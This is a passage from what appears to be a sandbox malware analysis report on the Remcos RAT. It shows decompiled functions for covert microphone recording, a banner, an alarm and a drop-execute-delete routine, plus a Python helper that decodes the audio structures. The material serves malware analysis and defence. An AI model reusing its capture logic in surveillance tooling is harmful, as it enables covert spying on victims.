                                   				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8); // a std::string serves as the PCM capture buffer
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				// WAVEHDR at 0x41b1a0 (0x20 bytes, the size passed to waveInPrepareHeader)
                                   				0x41b1a0->lpData = _t10;
                                   				_t11 =  *0x41b1d8; // 0x0
                                   				 *0x41b1a4 = _t11; // dwBufferLength
                                   				 *0x41b1a8 = 0; // dwBytesRecorded
                                   				 *0x41b1ac = 0; // dwUser
                                   				 *0x41b1b0 = 0; // dwFlags
                                   				 *0x41b1b4 = 0; // dwLoops
                                   				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                   				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                   				waveInStart( *0x41b210); // start microphone capture; the filled buffer is delivered to the callback
                                   				return 0;
                                   			}

                                   Instruction addresses mapped to the listing above: 0x00401519 through 0x0040163d

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                  • atoi.MSVCRT ref: 0040157F
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                  • waveInStart.WINMM ref: 00401633
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 1097200658-0
                                  • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                  • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%
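The constants that E00401519 above writes to 0x41b218 and 0x41b1a0 are the fields of a WAVEFORMATEX and a WAVEHDR, and the multiplications in the middle of the function size the capture buffer from a configured minute count. The following analyst helper is an added example; it is not part of the Joe Sandbox report or of the sample's code. It packs the header exactly as the listing does, validates the PCM invariants (useful when carving the structure from a dump), names the waveInOpen flag bits, and repeats the buffer arithmetic. The minute count, which the sample parses from config entry 0x24 with atoi, is a parameter here; the reading of 0x30008 as the fdwOpen argument is an interpretation of the listing.

```python
# Added example (analyst helper, not part of the Joe Sandbox report or of the
# sample): rebuild the WAVEFORMATEX / WAVEHDR that E00401519 fills in at
# 0x41b218 / 0x41b1a0, validate the PCM header, decode the waveInOpen flags,
# and repeat the function's buffer-size arithmetic. Field values are the
# constants from the listing; the minute count (config entry 0x24 in the
# sample) is a parameter.
import struct

# WAVEFORMATEX, 18 bytes, packed little-endian:
# wFormatTag, nChannels, nSamplesPerSec, nAvgBytesPerSec, nBlockAlign, wBitsPerSample, cbSize
WAVEFORMATEX = struct.Struct("<HHIIHHH")
# WAVEHDR on 32-bit Windows, 0x20 bytes (the size passed to waveInPrepareHeader):
# lpData, dwBufferLength, dwBytesRecorded, dwUser, dwFlags, dwLoops, lpNext, reserved
WAVEHDR = struct.Struct("<IIIIIIII")

WAVE_FORMAT_PCM = 1
CALLBACK_TYPEMASK = 0x00070000
CALLBACK_NAMES = {0x00000: "CALLBACK_NULL", 0x10000: "CALLBACK_WINDOW",
                  0x20000: "CALLBACK_THREAD", 0x30000: "CALLBACK_FUNCTION",
                  0x50000: "CALLBACK_EVENT"}
WAVE_OPEN_BITS = {0x1: "WAVE_FORMAT_QUERY", 0x2: "WAVE_ALLOWSYNC",
                  0x4: "WAVE_MAPPED", 0x8: "WAVE_FORMAT_DIRECT"}


def build_waveformatex() -> bytes:
    """Pack exactly what the sample stores at 0x41b218: 8 kHz, 8-bit, mono PCM."""
    return WAVEFORMATEX.pack(
        WAVE_FORMAT_PCM,  # 0x41b218 wFormatTag
        1,                # 0x41b21a nChannels
        0x1F40,           # 0x41b21c nSamplesPerSec (8000)
        0x1F40,           # 0x41b220 nAvgBytesPerSec
        1,                # 0x41b224 nBlockAlign
        8,                # 0x41b226 wBitsPerSample
        0,                # 0x41b228 cbSize
    )


def parse_waveformatex(blob: bytes) -> dict:
    """Decode 18 bytes (e.g. carved from a dump at 0x41b218) and check the PCM invariants."""
    tag, ch, rate, avg, align, bits, cb = WAVEFORMATEX.unpack_from(blob)
    fmt = {"wFormatTag": tag, "nChannels": ch, "nSamplesPerSec": rate,
           "nAvgBytesPerSec": avg, "nBlockAlign": align,
           "wBitsPerSample": bits, "cbSize": cb}
    if tag != WAVE_FORMAT_PCM or cb != 0:
        raise ValueError(f"not a plain PCM header: {fmt}")
    if align != ch * (bits // 8) or avg != rate * align:
        raise ValueError(f"inconsistent PCM header: {fmt}")
    return fmt


def recording_buffer_bytes(fmt: dict, minutes: int) -> int:
    """E00401519: samples = nSamplesPerSec * minutes * 0x3c   (stored at 0x41b1d0)
                  bytes   = (wBitsPerSample >> 3) * samples   (stored at 0x41b1d8)
    The byte count is then used for basic_string::resize and WAVEHDR.dwBufferLength."""
    samples = fmt["nSamplesPerSec"] * minutes * 0x3C
    return (fmt["wBitsPerSample"] >> 3) * samples


def build_wavehdr(lp_data: int, length: int) -> bytes:
    """The WAVEHDR at 0x41b1a0: only lpData and dwBufferLength are non-zero."""
    return WAVEHDR.pack(lp_data, length, 0, 0, 0, 0, 0, 0)


def describe_open_flags(fdw_open: int) -> list:
    """Name the waveInOpen fdwOpen bits. 0x30008, the value stored just before the
    call in the listing, decodes to CALLBACK_FUNCTION | WAVE_FORMAT_DIRECT, which
    matches the function-pointer callback E00401640 and device id -1 (WAVE_MAPPER)."""
    names = [CALLBACK_NAMES.get(fdw_open & CALLBACK_TYPEMASK, "CALLBACK_?")]
    names += [name for bit, name in WAVE_OPEN_BITS.items() if fdw_open & bit]
    return names


if __name__ == "__main__":
    fmt = parse_waveformatex(build_waveformatex())
    size = recording_buffer_bytes(fmt, 1)  # one minute of 8 kHz, 8-bit mono
    print(fmt, size, describe_open_flags(0x30008))
```

With the sample's header one configured minute is 480,000 bytes, so the minute value in the config directly sets how much microphone audio is held in memory before the single WAVEHDR completes and the callback at E00401640 runs.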

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                  • SetEvent.KERNEL32(?), ref: 0040F16D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040F18E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                    • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                    • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                    • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                    • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                    • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                    • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                    • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                    • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID:
                                  • API String ID: 3444260106-0
                                  • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                  • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E00413D3D(signed int __edx, intOrPtr _a4) {
                                  				void _v1003;
                                  				char _v1004;
                                  				struct HWND__* _t13;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				unsigned int _t40;
                                  				signed int _t41;
                                  				signed int _t47;
                                  				signed int _t50;
                                  				signed int _t56;
                                  				signed int _t59;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				void* _t91;
                                  				void* _t92;
                                  				void* _t93;
                                  
                                  				_t64 = __edx;
                                  				AllocConsole();
                                  				_t13 =  *0x41c1f8();
                                  				 *0x41c1fc = _t13;
                                  				if(_a4 == 0) {
                                  					ShowWindow(_t13, 0);
                                  				}
                                  				freopen("CONOUT$", 0x416e44, __imp___iob + 0x20);
                                  				_v1004 = 0;
                                  				memset( &_v1003, 0, 0xf9 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				_t65 = _t64 | 0xffffffff;
                                  				asm("repne scasb");
                                  				_t40 =  !_t65;
                                  				_t91 = " * Remcos v" - _t40;
                                  				_t41 = _t40 >> 2;
                                  				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                  				asm("repne scasb");
                                  				_t47 =  !_t65;
                                  				_t92 = "2.7.2 Pro" - _t47;
                                  				_t34 = _t47;
                                  				asm("repne scasb");
                                  				_t50 = _t34 >> 2;
                                  				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                  				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                  				asm("repne scasb");
                                  				_t56 =  !_t65;
                                  				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
                                  				_t36 = _t56;
                                  				asm("repne scasb");
                                  				_t59 = _t36 >> 2;
                                  				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                  				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                  				return printf( &_v1004); // banner assembled from " * Remcos v", "2.7.2 Pro" and "\n * BreakingSecurity.Net\n\n"
                                  			}

                                  Instruction addresses: 0x00413d3d to 0x00413e32

                                  APIs
                                  • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                  • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                  • freopen.MSVCRT ref: 00413D7C
                                  • printf.MSVCRT ref: 00413E25
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                  • API String ID: 3419900118-1124569734
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E0040E254(void* __eax, void* __eflags) {
                                  				void* _t7;
                                  				void* _t9;
                                  				void* _t28;
                                  
                                  				_t33 = __eflags;
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
                                  				E004017DD(_t28 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  Instruction addresses: 0x0040e254 to 0x0040e2aa, then 0x0040e6a4 to 0x0040e6c1 (shared cleanup and return)

                                  APIs
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                  • String ID: name
                                  • API String ID: 4248281052-1579384326
                                  • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                  • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00411AF5(void* __ecx, WCHAR* _a4) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t13;
                                  
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
                                  				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009); // 0x20009 = SND_FILENAME | SND_LOOP | SND_ASYNC: loop the sound file named by _a4
                                  				Sleep(0x2710); // 10000 ms
                                  				return PlaySoundW(0, 0, 0); // stop playback
                                  			}

                                  Instruction addresses: 0x00411b08 to 0x00411b58

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                  • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                  • Sleep.KERNEL32(00002710), ref: 00411B48
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                  • String ID: Alarm has been triggered!$[ALARM]
                                  • API String ID: 4004766653-1190268461
                                  • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                  • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040D8FF() {
                                  				void* _t10;
                                  				char* _t12;
                                  				int _t13;
                                  				char* _t15;
                                  				signed int _t16;
                                  				char* _t18;
                                  				void* _t41;
                                  				void* _t46;
                                  				intOrPtr _t51;
                                  
                                  				_t51 =  *0x41bf20; // 0x0
                                  				 *0x41c119 = 0;
                                  				if(_t51 != 0) {
                                  					E004020F4(_t10, 0x41bf20);
                                  				}
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
                                  				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t13 = atoi(_t12);
                                  				E0040F572();
                                  				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t16 = atoi(_t15);
                                  				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
                                  				E004017DD(_t46 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  Instruction addresses: 0x0040d901 to 0x0040d985, then 0x0040e6a4 to 0x0040e6c1 (shared cleanup and return)

                                  APIs
